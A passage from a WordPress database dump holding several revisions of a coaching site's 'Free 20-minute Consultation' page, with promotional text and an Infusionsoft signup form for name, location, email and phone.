value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 80px auto;float:right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 15:59:22', '2014-07-04 20:59:22', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1236, 4194, '2014-07-04 16:00:04', '2014-07-04 21:00:04', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<div style="width:47%; float:left;">\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</div>\r\n<div style="width:47%; float:left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto;float:right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 16:00:04', '2014-07-04 21:00:04', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1237, 4194, '2014-07-04 16:32:30', '2014-07-04 21:32:30', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<div style="width: 47%; float: left;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<p>&nbsp;</p>\r\n<h1> Schedule Your Free 20-minute Consultation</h1>\r\n<p>&nbsp;</p>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n</form></div>\r\n<div style="width: 47%; float: left;">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</div>\r\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-07-04 16:32:30', '2014-07-04 21:32:30', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1238, 4194, '2014-07-04 16:33:24', '2014-07-04 21:33:24', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 500px;">\r\n<p>&nbsp;</p>\r\n<h1> Schedule Your Free 20-minute Consultation</h1>\r\n<p>&nbsp;</p>\r\n<div style="width: 47%; float: left;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" 